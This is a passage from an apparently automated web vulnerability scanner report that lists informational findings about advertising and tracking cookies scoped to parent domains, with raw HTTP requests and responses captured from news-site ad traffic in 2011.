Z4i40yYFMUM2IND36b7ZFw4; fc=qPpK4X8K7ZjxVx0VJZDcdB_D1mN3lHI_BinJ1LdrOAbDh9xILOy7cWXWYifPzZ3iZjzoSdlEeqq3zCQrton2D32iD1a2418t8vlUtDGalV-JhisFugd5-2PmgEb-dzYcx_84B0Gt7iZQiKNqGC2CofHgZs6hnwrt4AvKtyKV8klPR1hRXEWvUhiTNhz33U4d9hTEpcCaiTjdUImk_rGRYl95QzLPGgcS4PLuvzPSDFoeX72gpvVoMR_dT1IU83itQkcPCNDBJR1s8ojl7c8L5k9KWBxjpL-6lYKR74fQmyE; pf=WmCQSJv_88YAF1TaCEjacvtFyKtKd3nkimHPVBGJrCArW05u4B9BwnHxy5LHSNbs0PyvhiQ9hEGFvp1qMvxzBcdiicNNmmE_aI2n_-oR-aRG9eqUO6PdyPlHytyWBeL6pt4N9d3OY-Qo6M3zGftguNTbm-VGCKrn7KG61o8a-hlxQgbL-MXnxJnxbWK81XM2fNbwnskl80J7FrpArydV4msv5xJnc6wiNkkgoc9ZHAqEvAXfc_b9CYsOLM4ObfRS-yQ0IxDS6yGV0bt0Oz4pJzQ3Hu9GorHJq3pkzhhXE4dM0xncvVUD6tMlnnlm_qWsojASvNxNlCtZvel71OhRg1_acYxwuGBwWmnpT3WVNmeWKUlZO7GlHHuYkG_xUYpdlRr7vUCIaoiDaMmpt_PvLCOUyLGtO0hHJuwGY5T09JX2RCeAmas1by9-2jjXtHbxIU6XTk6RPEnQXT9x2zEmWfAeEJZ2W4XMeMQpqzhWB_34UH3sPqU14UWUW_0z8Z0heNyepssmwJo9AEHB3dcHG8NqNopQF7bmOYrUClo2LIAxUFIqqMfzF-f5IilV9DF2EEtf1qwB8GY1P6ISMC2NEE-NukVybOAFf3snxZsusnThrdw025CqgpXbAJf_ZgK04z5LE7vpNsVQaepPKy5giom1bq2yFvVGruUD-0Zmu_IOz-UlYiPBN7JyoSoKGJwMowB-sj_YCAwsoyO3MSAriA-6SvpE8vfm17M_AiAxw4nAd1Y9GjRixW8BKZaPBicaTSnQ_qW1THdHtsDrSOwE7yWjUosqwui97JSt4J0g_MOMd0ReLIPTEksHwzd4gYkpoMm2n6Nulr0bAVvGt4WcZWdCKTjb3Ww3q4Lyh_VyGMuPK371XlXjo5X46eVqRbV699MOJ5eDdshYLSs5LFoOgILjO_vdFh0XnPmUquTICkH1HrsiJSZNWOX0SyN8dywaeYYZUTlRetsuBzMcxMWLQLNyiRU1bJ5Qpb7GomgPhXBwcMjXa09KP5HzekSxDcQK0SJw0JMmSyeQM3pYTVx-Ci-FU5aKfMy17HNvPHxNvxNrRXY1izURX-lyALi1AlxuBXTDiJUS-OqKWjm2DD4CuggKG3dUzHMmu04fSX5Ad4nEc6NlGzZLMuoExgCCt30kp2pmOmYcQYMZyZ05DubgihMl8PJOwcr8ldScAKqk7rGGnUh27gMWCyrnP1Di5AGzTucfcXTrqV1UJKyBhGxFYcQFai9M2J3rqJmFUgQdN5ATDIRwfK3uozaJUKhU4qVipaL_GD-TOTelik5DYCvXIYIInb3nfIa-ebQa7olHWWH486R4yxje4LN8GWCWWRe4IR0I9DtTjuVzRJkyZ8n66XpUPlCRi3tlvuMEH6BKrtjGsUA2wOoIXFuaM_JUwMHDgab4_aPrZdgl9Uf7tvD9rgyRTxnR6YKNm8Gu6ALXRmCYGTIP8i-wsqx8QkqNgi0F_hs9UZaVZDpy-HyTAsx-Y51cz4yJITcb0FaAWC4QbaWSbbOECFNVbSmOiTVVH4eEKD1WvX5M7UplxrzwIhN9Mwkgo1sMiNanUUl1UyNj_Qxjp4iBCha2ShvDZxpY4-NTPO_cWHxychz2AkV4XXIJ0g; uid=2931142961646634775; rrs=1%7C2%7C3%7C4%7C1002%7C6%7C7%7C7%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7C1007%7C1008; rds=15104%7C15104%7C15104%7C15104%7C15085%7C15104%7C15104%7C15082%7C15104%7C15104%7C15104%7C15104%7C15104%7C15104%7Cundefined%7C15104%7Cundefined%7C15097%7C15093; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Sat, 05-Nov-2011 14:00:15 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Mon, 09 May 2011 14:00:15 GMT

GIF89a.............!.......,...........D..;
9.78. http://r.turn.com/server/pixel.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/pixel.htm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /server/pixel.htm?fpid=4&sp=y&admeld_call_type=iframe&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=Dza9cImQIgAOYp1sdVBFKJ3j2mm-3nw5DLdjMDY9RiDfaqaDzVRu9ZiuBStYaftY-vQa-Lrt8AEh2sMWSofalPWfoLMBxH0g9IiAwEZtd5YPMEpw2Dimbl_Ar_3pbVlWCr9zpcNmhJ4YALFsRS0OjTgV6OPboE5AailwYD2p-IySdlkZutLQ7ZQ85RG7C4VB2qlA743KvZ39ywpdZbpMhh0Lmtiu91APHHd__cAh9gz07Cd5Zg6Jg2z-OuW7NiYiFK2x3qhPSvxxgQjvFMzvNsv0sG_uSycuZycGHG0i9JDVJjS_HVyCCR3CpH4C_z7OWENSx6qTFa7od7SUHN9Egei6BZRgi_D5YzTOICCuYCx9jiGo5Ucxoan5H4AQ_xV3iHql4u4O7_sSYdnd02k2DNQHkfpT4yC0sBHWKifDZRo8VXe-PeWk1nfFtbmH7GvZ1QMXO5GUno07zoygwBocRoTsxUcxWk5nbrSqN6k58j1TORmwcQ4tlm0RwihyF_UsCL2x9N8rCbkNMc9dtlOLKF16IBansyDt77nh-l623XjbgLPXgE5UhrKbb-yapi7Iz_t1m3RC9HNVGEroWY24Hx0ymz9iB_PZ274hwZ5aW0QB1cBEZ955Qck8jqa4MZ7v1aY1ttiEjhYPnmeJ7sqVaGWGUflWpKK8ZDluGXe-OMAMpHNeDinV6bUD4c7xTKPYqOV7QZ7aFBA3m0phFzvLGUyTINTvrbznNuEHAKkRnaoKqQQIp4dB6WERi9SKRUeAKB26GseFkfH7OU-Y9jArFwJN1aNKu26HMlC2vlBlEo3AibJolRtP9GKY2j0AIA4QF0ROUKwFAxzf5GHHC-l2sUbwMrieaxWXba1ERSK3tWWrKuMIkiwSl3Te1VhilaTSnNbIlFewbQ0HwOyAYWPKVOFzsrgdqMMSA-afxC3bSvIKc60386S8NF-JuqnS_gYeiHql4u4O7_sSYdnd02k2DGktwZFEgr-H1aRa-v8iL2Y8VXe-PeWk1nfFtbmH7GvZojS9aaLdC4dIDTz1p5oDzGZlZrZQz9gqPi_YpBWRR_zyJstfeR3BF0X80yINyf_bnscLz8pWZl03MCHITMyErF16IBansyDt77nh-l623XgQrvHzCa6-Ar3OKf1u5O9co8jF4KazkjYUhi9Y-2cpubMeTwvrsn6UDDgstfmlQPoNQYQoyiD68kJjw-yNw0ZU1aY1ttiEjhYPnmeJ7sqVaHrw4FE_cCyjpsbZ3unV7uMrdoKrhpnovF-eFvpriEhVrMfpGoruuBgzA1-jEhdCS2wFnaEJ_77D-SBSvq4apv0KqQQIp4dB6WERi9SKRUeApAoLbAXgH3MAg4fG-53hwYWvZ7p1zrzJVM0-BhBuMNYrc7Kk7dBes7lnotHfeZ9VkUKGgPT-wupZmNTexU6iznjzwSpHwNAhjAO4xxi375pcdR85v5iezdnNkxnuNwjFRvAyuJ5rFZdtrURFIre1ZZBSlbvBC0evnYqUUsRvAsWc1siUV7BtDQfA7IBhY8pUNZFdTBAhalBFYq3Dyxi9TBfNNCsQZvwCdk93ue_PwR2IeqXi7g7v-xJh2d3TaTYMVxQyOpakzryCsBb1QMcxxTxVd7495aTWd8W1uYfsa9lUSQm6Px99bWr2RVRxuk2yEM0JJ22tYCLP7uBw8UeaI1M5GbBxDi2WbRHCKHIX9Sz_QtJiSnym5S_qsqKzl484XXogFqezIO3vueH6XrbdeBrsNvqpBtQW35VrocWM1hJEMrVYqmvz7xJtELJ71uRTTECD0HA2vYVMATXXOR4kic7TP4ECMD5bQt22Ufb1ASjVpjW22ISOFg-eZ4nuypVoX3-sqUKgtXKTyeeAJ3WoNBTpFHNeMdsJNdx7bmFAC56JAHYn97lyiGJ5XDJCkUNkw_be5i-Fx9NF-BKeFGAMPAqpBAinh0HpYRGL1IpFR4AB4o7EViaAPEO7EwRwSKXjmcb3GKio9SBOsgaqPfeFsasCu54shXpdyVhXu91m5wiW91g1mAzej0c7wnGxz5vZRvAyuJ5rFZdtrURFIre1ZfDRnDTWzff-YlyXP_zUgfGc1siUV7BtDQfA7IBhY8pUeWxnJe61Raa9uTyiNiaLtdI3rxLW4kElZ2z2lu4o7hWIeqXi7g7v-xJh2d3TaTYML11pzoZIlFkYCIGVGm_tUjxVd7495aTWd8W1uYfsa9nlK9dyZVYIz5pmDpzdU80QQkZpM_cVFXYTcTTPOspL-TBLfO2ZZ5wOsMI8xMfjrvrnuyo8Yez2B_AzlVUYglieXXogFqezIO3vueH6XrbdeOZqLTJ2eUC5VtOBQseHiE81nClsShNFF0lz8B3FOROwHTKbP2IH89nbviHBnlpbRDDco7mBS3_DJ0ZnqsKZKeTVpjW22ISOFg-eZ4nuypVotMax7cw1A0lomZOewLLuUzHWvz6IKIMXKnKL80iX025NYG1qkKS0O8LGs7luRUbTpMVbMDENDpvIJh2_kOeZwWW0-b-WJf0ZFlMOgj84vlCimF9cP6eLyeThS4cELoZF7hIMY-yiS6od8aiwiVy6K8hyJ0-yKCmYc6DEnkoIDjLUURQ9jCbj0adNONAbHq6OIauKDPsVyaYkWyAz1a3QLsZ0HFEk9FUwZlIZoC4PKchFMfXO25PtkA1FJuDF1eIqRRk7NbH_3KXaXpegXdoohM0M5HiSWAEvqit8JfBxvjBBCecmNOFvmnxZXlybKUM3qIhRpr8zAond1hyHy2KCxQ9jRTaSUh9q8NAYC-8-qkSZEZsmx23qKVCrqZDyeipaIi4-WrfUh7IPblkcEwLIfWk4JnPVlR_zGm4PPqzfx4-ZPuIxR87K17SR-59M9UpIVvIMltY5lVfKu7zjIgIpMBKB2P8TaeZb5SMS1Kn2fJf0-MGZW4U9vWHTndk9ZYnTYKRbzB2AW8sPYtx1gLnWIDsYBLT8b4yTE_t-fjXYNBuH2MTsqi1WP1f5naPDjKNVGGv49osHpNOU5hR-g_XrO60jJc9MudtXKgUybYsjSwmSw3Whqt4otLu1R9f4pMroY6TrnX9AFtcCOq4KtB3OqN2gLia6NWPazuloW1Dp_gmgtfmkSSGnmz7Ck--msIbUItDCaX4V_0YzpDgobT5myGAQ1jpLDCI7HiZjNNO0_95EX9SUHeo0SvSjgEUZJK2gWAKmardOPRrryF1DhECcp1-YMQnoV4ZAArTQ0YurxnNN6cMRpOMh2nE5XzpH9jU_75X6gaFQNyuWz4EiPqighnBW1K7ySrDy2erbCyocIlO9iKCeGUvo-FRYRZN7b2HzshKpWim7EvVYj9LxNPbnlLRl7SF6Fz-Cqk4ilR2m1sd6XpoV6J-HdTmFEl8Fex_S_sTGaqkuGDnpWV_Epn14CgCD-1Od2j93-G993DJLn6laQk0A_YEjXCNxN4ufXJe2s8taXVc1ZwCaKwQ-ReuFBa_BvA0MPyd7JlyBvMOrx4RsY1dMYwNR_ohNoy9a29HQKTTBeSdexy7NjxMrQdbG848mPsvXEVp1Zp9tlw0PafTHwRamGgGanwtSRVH2wEa3NxSTCsrM00Brun6QttnrZ4i40yYFMUM2IND36b7ZFw4; fc=qPpK4X8K7ZjxVx0VJZDcdB_D1mN3lHI_BinJ1LdrOAbDh9xILOy7cWXWYifPzZ3iZjzoSdlEeqq3zCQrton2D32iD1a2418t8vlUtDGalV-JhisFugd5-2PmgEb-dzYcx_84B0Gt7iZQiKNqGC2CofHgZs6hnwrt4AvKtyKV8klPR1hRXEWvUhiTNhz33U4d9hTEpcCaiTjdUImk_rGRYl95QzLPGgcS4PLuvzPSDFoeX72gpvVoMR_dT1IU83itQkcPCNDBJR1s8ojl7c8L5k9KWBxjpL-6lYKR74fQmyE; pf=WmCQSJv_88YAF1TaCEjacvtFyKtKd3nkimHPVBGJrCArW05u4B9BwnHxy5LHSNbs0PyvhiQ9hEGFvp1qMvxzBcdiicNNmmE_aI2n_-oR-aRG9eqUO6PdyPlHytyWBeL6pt4N9d3OY-Qo6M3zGftguNTbm-VGCKrn7KG61o8a-hlxQgbL-MXnxJnxbWK81XM2fNbwnskl80J7FrpArydV4msv5xJnc6wiNkkgoc9ZHAqEvAXfc_b9CYsOLM4ObfRS-yQ0IxDS6yGV0bt0Oz4pJzQ3Hu9GorHJq3pkzhhXE4dM0xncvVUD6tMlnnlm_qWsojASvNxNlCtZvel71OhRg1_acYxwuGBwWmnpT3WVNmeWKUlZO7GlHHuYkG_xUYpdlRr7vUCIaoiDaMmpt_PvLCOUyLGtO0hHJuwGY5T09JX2RCeAmas1by9-2jjXtHbxIU6XTk6RPEnQXT9x2zEmWfAeEJZ2W4XMeMQpqzhWB_34UH3sPqU14UWUW_0z8Z0heNyepssmwJo9AEHB3dcHG8NqNopQF7bmOYrUClo2LIAxUFIqqMfzF-f5IilV9DF2EEtf1qwB8GY1P6ISMC2NEE-NukVybOAFf3snxZsusnThrdw025CqgpXbAJf_ZgK04z5LE7vpNsVQaepPKy5giom1bq2yFvVGruUD-0Zmu_IOz-UlYiPBN7JyoSoKGJwMowB-sj_YCAwsoyO3MSAriA-6SvpE8vfm17M_AiAxw4nAd1Y9GjRixW8BKZaPBicaTSnQ_qW1THdHtsDrSOwE7yWjUosqwui97JSt4J0g_MOMd0ReLIPTEksHwzd4gYkpoMm2n6Nulr0bAVvGt4WcZWdCKTjb3Ww3q4Lyh_VyGMuPK371XlXjo5X46eVqRbV699MOJ5eDdshYLSs5LFoOgILjO_vdFh0XnPmUquTICkH1HrsiJSZNWOX0SyN8dywaeYYZUTlRetsuBzMcxMWLQLNyiRU1bJ5Qpb7GomgPhXBwcMjXa09KP5HzekSxDcQK0SJw0JMmSyeQM3pYTVx-Ci-FU5aKfMy17HNvPHxNvxNrRXY1izURX-lyALi1AlxuBXTDiJUS-OqKWjm2DD4CuggKG3dUzHMmu04fSX5Ad4nEc6NlGzZLMuoExgCCt30kp2pmOmYcQYMZyZ05DubgihMl8PJOwcr8ldScAKqk7rGGnUh27gMWCyrnP1Di5AGzTucfcXTrqV1UJKyBhGxFYcQFai9M2J3rqJmFUgQdN5ATDIRwfK3uozaJUKhU4qVipaL_GD-TOTelik5DYCvXIYIInb3nfIa-ebQa7olHWWH486R4yxje4LN8GWCWWRe4IR0I9DtTjuVzRJkyZ8n66XpUPlCRi3tlvuMEH6BKrtjGsUA2wOoIXFuaM_JUwMHDgab4_aPrZdgl9Uf7tvD9rgyRTxnR6YKNm8Gu6ALXRmCYGTIP8i-wsqx8QkqNgi0F_hs9UZaVZDpy-HyTAsx-Y51cz4yJITcb0FaAWC4QbaWSbbOECFNVbSmOiTVVH4eEKD1WvX5M7UplxrzwIhN9Mwkgo1sMiNanUUl1UyNj_Qxjp4iBCha2ShvDZxpY4-NTPO_cWHxychz2AkV4XXIJ0g; rrs=1%7C2%7C3%7C4%7C1002%7C6%7C7%7C7%7C9%7C1001%7C1006%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7C1007%7C1008; rds=15093%7C15093%7C15093%7C15097%7C15085%7C15097%7C15097%7C15082%7C15093%7C15093%7C15091%7C15093%7C15093%7C15093%7Cundefined%7C15093%7Cundefined%7C15097%7C15093; rv=1; uid=2931142961646634775

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Sat, 05-Nov-2011 13:59:59 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 13:59:59 GMT
Content-Length: 335

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=4369754592172087684&fpid=4&nu=n&t=
...[SNIP]...
9.79. http://r1-ads.ace.advertising.com/site=743832/size=728090/u=2/bnum=29047542/hr=9/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.floridatoday.com%252Farticle%252F20110508%252FNEWS01%252F105080319%252FHighly-publicized-murder-Caylee-Anthony-rivets-enrages  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=743832/size=728090/u=2/bnum=29047542/hr=9/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.floridatoday.com%252Farticle%252F20110508%252FNEWS01%252F105080319%252FHighly-publicized-murder-Caylee-Anthony-rivets-enrages

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=743832/size=728090/u=2/bnum=29047542/hr=9/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.floridatoday.com%252Farticle%252F20110508%252FNEWS01%252F105080319%252FHighly-publicized-murder-Caylee-Anthony-rivets-enrages HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://media.adfrontiers.com/pq?t=f&s=923&ts=1304949604772&cm=1148&ac=5&at=1&xvk=60302672.07185271&fd=t&tc=1&rr=t
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=aw960013034229720018; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; SESSece087221ae81b2ccde2334499ee4548=d138b6ea0107f86bc8ce8957059b7431; s_pers=%20s_getnr%3D1304388622973-New%7C1367460622973%3B%20s_nrgvo%3DNew%7C1367460622975%3B; F1=B8ziF3kAAAAAgCsCAEAAgEABAAAABAAAAMAAgEA; BASE=Rgwq9yEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2unWu4QL44U5Tp5J7h57WACK9DFolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpUSJWcFkgw700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3eAQ44q0qPrQrsF+Mlvp1J!; ROLL=boAnq2C+ORAgHEGte/mz/DHyJN5VpuB!; C2=bN/xN5pqDIxFGxkovMg3sYU8SKMCItdBwhQ3WXAcIsY4FAHCw3gBwhQ7NYAcIoLOGAHCKGeBwhwmhXAcI8eDGAHCdDmBwhwohXAcIQY4FAHCYimBwhA3WaAcIoa4FAHCA9qBwhgdeZAcI4fFGAHCbTeBwhwKOaAcIoN5FAHCC9qBwhwtZaAcIE0rGAHCFBqBwhQTaaAcIY4dGAHCNLqBwVrqDoxsGFftrSQIzaQHRGABg2cxFZm5IaMJxOCBsRphd0I9HsfzFz+i4SQBwWkTltCqGXFseSw7RaIXVSPBrLqRONJUEQT2FyFruTQAzZIX0KHBbzqhcl6BE8sXGyFogRwrgYc4zWdBkoqRwM67FcNNGhWkAbwuRXMUumvBEOpR+NLUGsEpGlIq+bQoeZ4jfOsBgwhB3W7/HUJtGTRZpTrxMFqFH09IGrUo8ew5qYITY6wBsMiBqcAnjagKHEv9FoSqGdQ9fZI2FirZDugxkELJI8GlGlE; GUID=MTMwNDk0OTU5NTsxOjE2cjRvcHExdHZsa21sOjM2NQ

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 09 May 2011 14:00:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.884214.743832.0XMC
Set-Cookie: F1=Bg28H3kAAAAAYm1CAEAAgEABAAAABAAAAEAAgEA; domain=advertising.com; expires=Wed, 08-May-2013 14:00:08 GMT; path=/
Set-Cookie: BASE=Rgwq9yEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2unWu4QL44U5Tp5J7h57WACK9DFolo7ZgEc+TO66LxZCWBHxwyDEc8c4CpUSJWcFkgw700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3eAQ44q0qPrQrsF+Mlvp1J!; domain=advertising.com; expires=Wed, 08-May-2013 14:00:08 GMT; path=/
Set-Cookie: ROLL=boAno2CkdKAgj1G!; domain=advertising.com; expires=Wed, 08-May-2013 14:00:08 GMT; path=/
Set-Cookie: 29047542=_4dc7f368,4264037248,743832^884214^81^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 09 May 2011 14:00:08 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 601

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3175.272756.AOL-ADVERTISING2/B4640114.5;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000743832/m
...[SNIP]...
9.80. http://rt.legolas-media.com/lgrt  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rt.legolas-media.com
Path:   /lgrt

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lgrt?ci=2&ei=9&ti=53&pbi=36&ord=5068520 HTTP/1.1
Host: rt.legolas-media.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ui=05a5761a-b8e3-4fc1-b933-f9f7eb10c6b9; lgtix=HAACALsA

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 13:59:50 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: lgpr=//8=; path=/; expires=Tue, 10 May 2011 13:59:50 GMT; domain=.legolas-media.com
P3P: policyref="http://www.legolas-media.com/w3c/p3p.xml",CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: -1
Cache-Control: no-cache; no-store
Content-Type: application/javascript
Set-Cookie: lgtix=NQABAL0AHAACALsA; path=/; expires=Sat, 01-Jan-2050 23:59:59 GMT; domain=.legolas-media.com
Content-Length: 0
Connection: close

9.81. http://services.krxd.net/pixel.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://services.krxd.net
Path:   /pixel.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel.gif?_kcp_d=nme.com&_kpid=3efee9db-7d85-4533-9e41-c635ebf2d937&_kcp_s=NME&_kcp_sc=News&_kcp_ssc=news&_kua_loggedIn=no&_kpa_pageTitle=Sufjan%20Stevens%20suffered%20%26%23039%3Bbreakdown%26%23039%3B%20while%20watching%20%26%23039%3BFantastic%20Mr%20Fox%26%23039%3B%20%7C%20News%20%7C%20NME.COM&_kpa_contentId=none&_knifr=14&_kpix_0=http%3A%2F%2Fpixel.rubiconproject.com%2Ftap.php%3Fv%3D4705&_kpix_1=http%3A%2F%2Fwww.burstbeacon.com%2Fview%2F103170%2F64948%2F182030%2F318088%2F3050%2F2D1A28EF%2F&_kpix_2=http%3A%2F%2Fwww.burstnet.com%2Fenlightn%2F7578%2F%2F12A4%2F&_kpix_3=http%3A%2F%2Fb.scorecardresearch.com%2Fb%3FC1%3D8%26C2%3D6035047%26C3%3D201.2%26C4%3Dad20731a%26C5%3D182030%26C6%3D0%26C7%3Dhttp%253A%2F%2Fwww.nme.com%2Fnews%2Fsufjan-stevens%2F56527%26C8%3DSufjan%2520Stevens%2520suffered%2520%2527breakdown%2527%2520while%2520watching%2520%2527Fantastic%2520Mr%2520Fox%2527%2520%257C%2520News%2520%257C%2520NME.COM%26C9%3D%26C10%3D1920x1200%26rn%3D46905169&_kpix_4=http%3A%2F%2Fpixel.quantserve.com%2Fpixel%2Fp-e4m3Yko6bFYVc.gif%3Flabels%3DMusic%2CEntertainment&_kpix_5=http%3A%2F%2Ftrgca.opt.fimserve.com%2Ffp.gif%3Fpixelid%3D287-036699%26diresu%3D154dab7990adc1d6f3372c12&_kpix_6=http%3A%2F%2Fpixel.quantserve.com%2Fpixel%2Fp-e4m3Yko6bFYVc.gif%3Flabels%3DMusic%2CEntertainment&_kpix_7=http%3A%2F%2Ftrgca.opt.fimserve.com%2Ffp.gif%3Fpixelid%3D287-036699%26diresu%3D154dab7990adc1d6f3372c12&_kpix_8=http%3A%2F%2Fpixel.quantserve.com%2Fpixel%2Fp-e4m3Yko6bFYVc.gif%3Flabels%3DMusic%2CEntertainment&_kpix_9=http%3A%2F%2Ftrgca.opt.fimserve.com%2Ffp.gif%3Fpixelid%3D287-036699%26diresu%3D154dab7990adc1d6f3372c12&_kpix_10=http%3A%2F%2Faka-cdn-ns.adtech.de%2Fimages%2F175%2FAd2832047St1Sz16Sq3827014V1Id5.gif HTTP/1.1
Host: services.krxd.net
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: private, no-cache, no-store
Content-Type: image/gif
Date: Mon, 09 May 2011 14:07:03 GMT
Last-Modified: Tue, 14 Dec 2010 00:06:17 GMT
P3P: policyref="http://cdn.krxd.net/kruxcontent/p3p.xml", CP="NON DSP COR NID OUR DEL SAM OTR UNR COM NAV INT DEM CNT STA PRE LOC OTC"
Server: Apache
Set-Cookie: _kuid_=10.83.71.216.1304950023530725; path=/; expires=Sat, 05-Nov-11 14:07:03 GMT; domain=.krxd.net
X-Request-Time: D=102 t=1304950023530639
X-Served-By: logger005.krxd.net
Content-Length: 42
Connection: keep-alive

GIF89a.............!.......,........@..D.;
9.82. http://sitelife.floridatoday.com/ver1.0/daapi2.api  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.floridatoday.com
Path:   /ver1.0/daapi2.api

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

